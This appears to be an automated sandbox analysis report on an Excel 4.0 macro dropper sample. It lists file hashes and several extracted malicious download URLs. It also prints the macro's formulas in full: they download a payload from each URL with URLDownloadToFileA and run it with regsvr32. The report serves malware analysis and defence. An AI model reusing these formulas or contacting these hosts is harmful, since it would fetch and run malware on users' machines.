General

  • Target

    eda3427023c2e99eee1689a72dc33f3b509adcc3afe0cb036d9a94bf076f63e2

  • Size

    50KB

  • Sample

    241120-qljwvsxmet

  • MD5

    6eb8e6f7e25e1584d15b3b12f073e4df

  • SHA1

    00ad4bbd20750316d331ce2e494c8beceb5f4569

  • SHA256

    eda3427023c2e99eee1689a72dc33f3b509adcc3afe0cb036d9a94bf076f63e2

  • SHA512

    1bc8e8f7db84beb0fe2b8978444c8f3c550daa5fb552259a91eafeaf1479d20b0b1e13290b5453ed890ed426baa66058f70ce21f991e5f2b89339c1e27cb7eb3

  • SSDEEP

    768:Sx9D9onkH+lSQHAamYDSmPq9A3Bj9DLC+9uSEcmQThnuG3KA0Zl:SXD9oencDSmSIBlGeuSEcm2h0BZl

Score
10/10

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://actividades.laforetlanguages.com/wp-admin/WQNAwrWi77MV8a05fia/

http://consejosdeorlando.com/wp-includes/mMaIlj99Y1C1sYN/

http://aopda.org/wp-content/uploads/KXc3Agu18w/

http://agenciaml.com.br/wp-content/lMGfW5Wk09k/

http://advogadogoiania.com.br/wp-includes/VTz0V6D/

http://101.53.142.76/ApcCache/FiXQvn/

https://www.agenciaigual.com.br/Novo2017/yTZMu9FxcyHYFUkb/

Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://actividades.laforetlanguages.com/wp-admin/WQNAwrWi77MV8a05fia/","..\en.ocx",0,0)
    =IF('DEFGW'!G9<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://consejosdeorlando.com/wp-includes/mMaIlj99Y1C1sYN/","..\en.ocx",0,0))
    =IF('DEFGW'!G11<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://aopda.org/wp-content/uploads/KXc3Agu18w/","..\en.ocx",0,0))
    =IF('DEFGW'!G13<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://agenciaml.com.br/wp-content/lMGfW5Wk09k/","..\en.ocx",0,0))
    =IF('DEFGW'!G15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://advogadogoiania.com.br/wp-includes/VTz0V6D/","..\en.ocx",0,0))
    =IF('DEFGW'!G17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://101.53.142.76/ApcCache/FiXQvn/","..\en.ocx",0,0))
    =IF('DEFGW'!G19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.agenciaigual.com.br/Novo2017/yTZMu9FxcyHYFUkb/","..\en.ocx",0,0))
    =IF('DEFGW'!G21<0,CLOSE(0),)
    =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\en.ocx")
    =RETURN()

Extracted

Language    Source          URLs
xlm4.0      xlm40.dropper   http://actividades.laforetlanguages.com/wp-admin/WQNAwrWi77MV8a05fia/
            xlm40.dropper   http://consejosdeorlando.com/wp-includes/mMaIlj99Y1C1sYN/
            xlm40.dropper   http://aopda.org/wp-content/uploads/KXc3Agu18w/

Targets

    • Target

      eda3427023c2e99eee1689a72dc33f3b509adcc3afe0cb036d9a94bf076f63e2

    • Size

      50KB

    • MD5

      6eb8e6f7e25e1584d15b3b12f073e4df

    • SHA1

      00ad4bbd20750316d331ce2e494c8beceb5f4569

    • SHA256

      eda3427023c2e99eee1689a72dc33f3b509adcc3afe0cb036d9a94bf076f63e2

    • SHA512

      1bc8e8f7db84beb0fe2b8978444c8f3c550daa5fb552259a91eafeaf1479d20b0b1e13290b5453ed890ed426baa66058f70ce21f991e5f2b89339c1e27cb7eb3

    • SSDEEP

      768:Sx9D9onkH+lSQHAamYDSmPq9A3Bj9DLC+9uSEcmQThnuG3KA0Zl:SXD9oencDSmSIBlGeuSEcm2h0BZl

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

MITRE ATT&CK Enterprise v15

Tasks